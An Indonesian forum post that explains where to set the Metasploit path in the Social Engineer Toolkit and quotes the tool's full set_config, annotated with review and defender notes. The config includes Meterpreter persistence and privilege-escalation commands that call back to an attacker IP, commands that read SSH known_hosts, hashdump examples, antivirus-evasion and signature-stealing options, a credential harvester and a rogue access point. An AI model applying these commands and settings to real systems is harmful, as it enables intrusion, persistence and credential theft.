Cari dulu di mana lokasi folder Metasploit-nya,
lalu edit nilainya di set_config.
Quote:
##################################################################################################
##################################################################################################
## ##
## The following config file will allow you to customize settings within ##
## the Social Engineer Toolkit. The lines that do not have comment code ##
## ("#") are the fields you want to toy with. They are pretty easy to ##
## understand. ##
## ##
## The Metasploit path is the default path for where Metasploit is located. ##
## Metasploit is required for SET to function properly. ##
## ##
## The ETTERCAP function specifies if you want to use ARP Cache poisoning in ##
## conjunction with the web attacks, note that ARP Cache poisoning is only ##
## for internal subnets only and does not work against people on the internet. ##
## ##
## The SENDMAIL option allows you to spoof source IP addresses utilizing an ##
## application called SendMail. Sendmail is NOT installed by default on BackTrack5. ##
## To spoof email addresses when performing the mass email attacks, you must ##
## install Sendmail manually using: apt-get install sendmail ##
## ##
## Note that ETTERCAP and SENDMAIL flags only accept ON or OFF switches. ##
## ##
## Note that the Metasploit_PATH cannot have a / after the folder name. ##
## ##
## There are additional options, read the comments for additional descriptions. ##
## ##
##################################################################################################
##################################################################################################
#
# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
# THE PATH MUST NOT END WITH A / AFTER THE FOLDER NAME (SEE THE HEADER OF THIS FILE).
# NOTE(REVIEW): THE TRAILING " <-----" ON THE LINE BELOW IS THE FORUM POSTER'S MARKER FOR THE
# LINE TO EDIT, NOT PART OF THE VALUE. LEAVE IT OUT OF THE REAL set_config, WHERE IT WOULD
# PRESUMABLY BE READ AS PART OF THE PATH -- CONFIRM AGAINST THE PARSER.
METASPLOIT_PATH=/opt/metasploit-4.3.0/msf3 <-----
#
# THIS WILL TELL WHAT DATABASE TO USE WHEN USING THE METASPLOIT FUNCTIONALITY. DEFAULT IS POSTGRESQL
METASPLOIT_DATABASE=postgresql
#
# HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLOIT ENCODING OPTIONS
ENCOUNT=4
#
# IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO
# NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES
# THE BROWSER, HOWEVER IT CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING.
# NOTE(REVIEW): FOR DEFENDERS, THE COMMENT ABOVE IMPLIES THE SESSION ENDS UP INSIDE A
# notepad.exe PROCESS; A notepad.exe THAT HOLDS NETWORK CONNECTIONS IS WORTH ALERTING ON.
AUTO_MIGRATE=OFF
#
# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=legit.binary
#
# THIS IS FOR THE BACKDOORED EXECUTABLE IF YOU WANT TO KEEP THE EXECUTABLE TO STILL WORK. NORMALLY
# WHEN legit.binary IS USED, IT WILL RENDER THE APPLICATION USELESS. SPECIFYING THIS WILL KEEP THE
# APPLICATION WORKING
BACKDOOR_EXECUTION=ON
#
# HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS
# MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE
# PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON
# THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPARATE THE COMMANDS BY A ;
# NOTE(REVIEW): BOTH TRIGGERS ARE OFF IN THIS LISTING, SO THE *_MULTI_COMMANDS VALUES
# FURTHER DOWN ARE PRESUMABLY IGNORED UNTIL A TRIGGER IS TURNED ON -- CONFIRM.
# NOTE(REVIEW): EACH LINUX_ KEY NAME CONTAINS THE NON-LINUX KEY NAME AS A SUBSTRING. IF THE
# READER MATCHES KEYS BY SUBSTRING RATHER THAN AT LINE START, LINE ORDER MAY DECIDE WHICH
# VALUE IS PICKED UP -- VERIFY BEFORE REORDERING THESE LINES.
METERPRETER_MULTI_SCRIPT=OFF
LINUX_METERPRETER_MULTI_SCRIPT=OFF
#
# WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED.
# BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPARATE WITH A ;. FOR EXAMPLE YOU COULD DO
# run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS
# NOTE(REVIEW): THE VALUES CONTAIN SPACES AND ; CHARACTERS AND ARE NOT QUOTED; THE WHOLE
# REST OF THE LINE AFTER THE FIRST = IS PRESUMABLY TAKEN AS THE VALUE.
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
#
# THIS IS THE PORT THAT IS USED FOR THE IFRAME INJECTION USING THE METASPLOIT BROWSER ATTACKS
# BY DEFAULT THIS PORT IS 8080 HOWEVER EGRESS FILTERING MAY BLOCK THIS. MAY WANT TO ADJUST TO
# SOMETHING LIKE 21 OR 53
# NOTE(REVIEW): FOR DEFENDERS, THE ADVICE ABOVE IS WHY EGRESS RULES SHOULD BE PROTOCOL-AWARE:
# HTTP TRAFFIC LEAVING ON PORT 21 OR 53 IS AN ANOMALY A PROXY OR IDS CAN FLAG.
METASPLOIT_IFRAME_PORT=8080
#
# DEFINE TO USE ETTERCAP OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF
# (PER THE FILE HEADER, ARP CACHE POISONING ONLY APPLIES TO INTERNAL SUBNETS.)
ETTERCAP=OFF
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap
#
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP OR DSNIFF TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
# NOTE(REVIEW): THE EXAMPLE ABOVE NAMES ETTERCAP_INTERFACE, BUT THE KEY ACTUALLY SET BELOW IS
# ETTERCAP_DSNIFF_INTERFACE; USE THE KEY NAME AS WRITTEN ON THE VALUE LINE.
ETTERCAP_DSNIFF_INTERFACE=eth0
#
# DEFINE TO USE DSNIFF OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF
# IF DSNIFF IS SET TO ON, ETTERCAP WILL AUTOMATICALLY BE DISABLED.
DSNIFF=OFF
#
# AUTO DETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
# NOTE(REVIEW): "UTILIZING GOOGLE" SUGGESTS AN OUTBOUND CONNECTION IS MADE WHEN THIS IS ON;
# ON AN ISOLATED LAB NETWORK THAT LOOKUP PRESUMABLY FAILS -- CONFIRM AND SET TO OFF THERE.
AUTO_DETECT=ON
#
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
# (PER THE FILE HEADER, SENDMAIL MUST BE INSTALLED SEPARATELY AND THIS FLAG ONLY ACCEPTS ON OR OFF.)
# NOTE(REVIEW): FOR DEFENDERS, SPF, DKIM AND DMARC ENFORCEMENT ON THE RECEIVING DOMAIN IS THE
# CONTROL THAT REJECTS MAIL WITH A FORGED SENDER ADDRESS.
SENDMAIL=OFF
#
# EMAIL PROVIDER LIST SUPPORTS GMAIL, HOTMAIL, AND YAHOO. SIMPLY CHANGE IT TO THE PROVIDER YOU WANT TO
# USE.
EMAIL_PROVIDER=GMAIL
#
# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF
#
# MAN LEFT IN THE MIDDLE PORT, THIS WILL BE USED FOR THE WEB SERVER BIND PORT
MLITM_PORT=80
#
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
# NOTE(REVIEW): ONLY RELEVANT WHEN APACHE_SERVER IS ON, WHICH IT IS NOT IN THIS LISTING.
APACHE_DIRECTORY=/var/www
#
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80. THIS ALSO GOES IF YOU ARE USING APACHE_SERVER EQUAL ON.
# YOU NEED TO SPECIFY WHAT PORT APACHE IS LISTENING ON IN ORDER FOR THIS TO WORK PROPERLY.
WEB_PORT=80
#
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER. NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT5 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
# NOTE(REVIEW): JAVA 6 NO LONGER RECEIVES PUBLIC SECURITY UPDATES; A HOST THAT STILL CARRIES
# THIS JDK SHOULD BE AN ISOLATED TEST MACHINE, NOT A GENERAL-PURPOSE WORKSTATION.
SELF_SIGNED_APPLET=OFF
#
# THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFERENT.
# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
# NOTE(REVIEW): THE VALUE CONTAINS SPACES AND IS NOT QUOTED.
JAVA_ID_PARAM=Secure Java Applet
#
# JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA APPLET IF
# THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. THIS GIVES
# A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
# NOTE(REVIEW): FOR USER-AWARENESS MATERIAL: A SIGNING PROMPT THAT REAPPEARS AFTER CANCEL IS
# ITSELF THE WARNING SIGN; CLOSING THE TAB OR BROWSER ENDS IT, CLICKING RUN DOES NOT.
JAVA_REPEATER=ON
#
# JAVA REPEATER TIMING WHICH IS THE DELAY IT TAKES BETWEEN THE USER HITTING CANCEL TO
# WHEN THE NEXT JAVA APPLET RUNS. BE CAREFUL SETTING TOO LOW AS IT WILL SPAWN THEM OVER
# AND OVER EVEN IF THEY HIT RUN. 200 EQUALS 2 SECONDS.
# NOTE(REVIEW): BY THAT EXAMPLE THE UNIT IS HUNDREDTHS OF A SECOND, WHEREAS WEBJACKING_TIME IN
# THIS SAME FILE IS DOCUMENTED AS MILLISECONDS (5000 = 5 SECONDS). DO NOT ASSUME A SHARED UNIT.
JAVA_TIME=200
#
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOU'RE USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! TO TURN THIS ON TURN SELF_SIGNED_CERT
# TO THE ON POSITION.
# NOTE(REVIEW): THE PEM PATHS THEMSELVES ARE SET FURTHER DOWN (PEM_CLIENT / PEM_SERVER); THE
# KEY DIRECTLY BELOW ONLY SWITCHES SELF-SIGNED CERTIFICATE CREATION ON OR OFF.
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
# NOTE(REVIEW): THE COMMENT ABOVE DESCRIBES THESE AS PRIVATE; KEEP THE FILES READABLE ONLY BY
# THE ACCOUNT THAT RUNS SET (E.G. MODE 600) AND OUT OF ANY SHARED OR WEB-SERVED DIRECTORY.
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
#
# TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
# (SO THE UNIT IS MILLISECONDS AND THE VALUE BELOW IS 2 SECONDS.)
WEBJACKING_TIME=2000
#
# COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT
# SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES.
# NOTE(REVIEW): 0.0.0.0 EXPOSES THE COMMAND CENTER ON EVERY NETWORK THE HOST IS ATTACHED TO, AND
# NOTHING IN THIS FILE CONFIGURES AUTHENTICATION OR TLS FOR IT. KEEP 127.0.0.1 AND REACH IT
# THROUGH AN SSH TUNNEL, OR RESTRICT THE PORT WITH A HOST FIREWALL, RATHER THAN BINDING WIDE.
COMMAND_CENTER_INTERFACE=127.0.0.1
#
# PORT FOR THE COMMAND CENTER
COMMAND_CENTER_PORT=44444
#
# THIS WILL REMOVE THE SET INTERACTIVE SHELL FROM THE MENU SELECTION. THE SET PAYLOADS ARE LARGE IN NATURE
# AND THINGS LIKE THE PWNIEXPRESS NEED SMALLER SET BUILDS
# NOTE(REVIEW): THE COMMENT DOES NOT SAY WHICH VALUE REMOVES THE SHELL; PRESUMABLY ON KEEPS IT
# IN THE MENU AND OFF REMOVES IT -- CONFIRM AGAINST THE TOOL BEFORE RELYING ON THIS.
SET_INTERACTIVE_SHELL=ON
#
# WHAT DO YOU WANT TO USE FOR YOUR DEFAULT TERMINAL WITHIN THE COMMAND CENTER. THE DEFAULT IS XTERM
# THE OPTIONS YOU HAVE ARE AS FOLLOWS - GNOME, KONSOLE, XTERM, SOLO. IF YOU SELECT SOLO IT WILL PLACE
# ALL RESULTS IN THE SAME SHELL YOU USED TO OPEN THE SET-WEB INTERFACE. THIS IS USEFUL IF YOU'RE USING
# SOMETHING THAT ONLY HAS ONE CONSOLE, LET'S SAY AN IPHONE OR IPAD.
# (THIS LISTING USES SOLO, NOT THE XTERM DEFAULT MENTIONED ABOVE.)
TERMINAL=SOLO
#
# DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED
# FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING
# THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION
# NOTE(REVIEW): THE URL ABOVE IS PLAIN HTTP AND GOOGLE CODE HAS SINCE BEEN ARCHIVED; TAKE
# pefile FROM A SOURCE WHOSE INTEGRITY YOU CAN VERIFY RATHER THAN FROM THIS LINK.
# NOTE(REVIEW): FOR DEFENDERS, A SIGNATURE COPIED ONTO ANOTHER FILE PRESUMABLY DOES NOT
# VALIDATE; CHECK THAT A SIGNATURE VERIFIES, NOT MERELY THAT ONE IS PRESENT.
DIGITAL_SIGNATURE_STEAL=ON
#
# THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT
# TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER.
UPX_ENCODE=ON
UPX_PATH=/usr/bin/upx
#
# THIS FEATURE WILL TURN ON OR OFF THE AUTOMATIC REDIRECTION. BY DEFAULT FOR EXAMPLE IN MULTI-ATTACK
# THE SITE WILL REDIRECT ONCE ONE SUCCESSFUL ATTACK IS USED. SOME PEOPLE MAY WANT TO USE JAVA APPLET
# AND CREDENTIAL HARVESTER FOR EXAMPLE.
AUTO_REDIRECT=ON
#
# THIS WILL REDIRECT THE HARVESTER VICTIM TO THIS WEBSITE ONCE EXECUTED AND NOT TO THE ORIGINAL WEBSITE.
# FOR EXAMPLE IF YOU CLONE ABCOMPANY.COM AND BELOW IT SAYS BLAHBLAHCOMPANY.COM, IT WILL REDIRECT THERE INSTEAD.
# THIS IS USEFUL IF YOU WANT TO REDIRECT THE VICTIM TO AN ADDITIONAL SITE AFTER HARVESTER HAS TAKEN THE CREDENTIALS.
# SIMPLY TURN HARVESTER REDIRECT TO ON THEN ENTER HTTP://WEBSITEOFYOURCHOOSING.COM IN THE HARVESTER URL BELOW
# TO CHANGE.
HARVESTER_REDIRECT=OFF
#
# NOTE(REVIEW): THE VALUE BELOW IS THE UNSET PLACEHOLDER; WITH HARVESTER_REDIRECT OFF IT IS
# PRESUMABLY NEVER USED.
HARVESTER_URL=http://thishasnotbeenset
#
# THIS FEATURE WILL AUTO EMBED AN IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE.
# USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN
# IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED
# AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES.
# NOTE(REVIEW): FOR DEFENDERS, BLOCKING OUTBOUND SMB (TCP 139/445) AT THE NETWORK EDGE AND
# DISABLING LM/NTLMv1 STOPS CLIENTS FROM HANDING AUTHENTICATION HASHES TO AN EXTERNAL UNC PATH.
UNC_EMBED=OFF
#
# THIS FEATURE WILL ATTEMPT TO CREATE A ROGUE ACCESS POINT AND REDIRECT VICTIMS BACK TO THE
# SET WEB SERVER WHEN ASSOCIATED. IT USES AIRBASE-NG AND DNSSPOOF.
# NOTE(REVIEW): BOTH TOOL PATHS POINT INTO /usr/local/sbin, I.E. LOCALLY BUILT BINARIES RATHER
# THAN PACKAGE-MANAGED ONES; THE PATHS MUST MATCH WHERE THE TOOLS ACTUALLY LIVE ON THE HOST.
ACCESS_POINT_SSID=linksys
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
#
# THIS WILL CONFIGURE THE DEFAULT CHANNEL THAT THE WIRELESS ACCESS POINT ATTACK BROADCASTS ON THROUGH WIFI
# COMMUNICATIONS.
AP_CHANNEL=9
#
# THIS WILL ENABLE THE POWERSHELL SHELLCODE INJECTION TECHNIQUE WITH EACH JAVA APPLET. IT WILL BE USED AS
# A SECOND FORM IN CASE THE FIRST METHOD FAILS. PLEASE NOTE THAT THIS IS EXTREMELY EXPERIMENTAL AT THIS
# POINT. IT IS NOT 100 PERCENT WORKING YET.
# NOTE(REVIEW): THIS IS ON IN THE LISTING EVEN THOUGH THE COMMENT CALLS IT EXPERIMENTAL.
# NOTE(REVIEW): FOR DEFENDERS, POWERSHELL SCRIPT BLOCK AND MODULE LOGGING ON ENDPOINTS IS THE
# TELEMETRY THAT RECORDS THIS KIND OF IN-MEMORY ACTIVITY.
POWERSHELL_INJECTION=ON
#
# THIS WILL DISPLAY THE OUTPUT OF THE POWERSHELL INJECTION ATTACK SO YOU CAN SEE WHAT IS BEING PLACED ON THE
# SYSTEM.
POWERSHELL_VERBOSE=OFF
#
# THIS WILL PROFILE THE VICTIM MACHINE AND CHECK FOR INSTALLED VERSIONS AND REPORT BACK ON THEM
# NOTE THIS IS CURRENTLY DISABLED. DEVELOPMENT IS UNDERWAY ON THIS FEATURE
WEB_PROFILER=OFF
#
# PORT NUMBERS FOR THE JAVA APPLET ATTACK LINUX/OSX ATTACKS, REVERSE PAYLOADS
OSX_REVERSE_PORT=8080
#
LINUX_REVERSE_PORT=8081
#
#
# USER AGENT STRING FOR WHEN USING ANYTHING THAT CLONES THE WEBSITE, THIS USER AGENT WILL BE USED
# NOTE(REVIEW): FOR DEFENDERS, CLONING REQUESTS CARRY THIS FIXED, DATED USER AGENT UNLESS IT IS
# CHANGED, WHICH MAKES THEM SEARCHABLE IN THE WEB SERVER LOGS OF THE SITE BEING COPIED.
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
#
# THE WAY THE SET INTERACTIVE SHELL WORKS IS IT FIRST DEPLOYS A STAGER PAYLOAD THAT PULLS AN ADDITIONAL EXECUTABLE.
# THE DOWNLOADER IS CURRENTLY BEING PICKED UP BY A/V AND IS ACTUALLY SOMEWHAT HARD TO OBFUSCATE BECAUSE IT HAS
# SIMILAR CHARACTERISTICS OF A DOWNLOAD/EXEC. IF YOU TURN THIS FEATURE ON, SET WILL DOWNLOAD THE INTERACTIVE SHELL
# STRAIGHT WITHOUT USING THE STAGER. ONLY ISSUE WITH THIS IS THERE MAY BE A DELAY ON THE USER END HOWEVER STILL
# SHOULDN'T BE NOTICED
SET_SHELL_STAGER=OFF
#
# DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND.
# (ON, AS IN THIS LISTING, LEAVES THE BACKGROUND LISTENER ENABLED.)
AUTOMATIC_LISTENER=ON
#
# THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS
# OR THE OTHER ATTACK VECTORS.
# NOTE(REVIEW): THE FILE HEADER STATES THAT METASPLOIT IS REQUIRED FOR SET TO FUNCTION PROPERLY,
# WHICH READS AS CONFLICTING WITH THIS OPTION; PRESUMABLY OFF LIMITS SET TO THE VECTORS THAT
# DO NOT NEED METASPLOIT -- CONFIRM.
METASPLOIT_MODE=ON
#
####################################################################################################
Baris yang saya beri tanda panah (<-----) itu yang diedit dengan lokasi folder Metasploit-nya; tanda panahnya sendiri jangan ikut ditulis.
Untuk set_config, lokasinya bisa dicari menggunakan perintah locate set_config.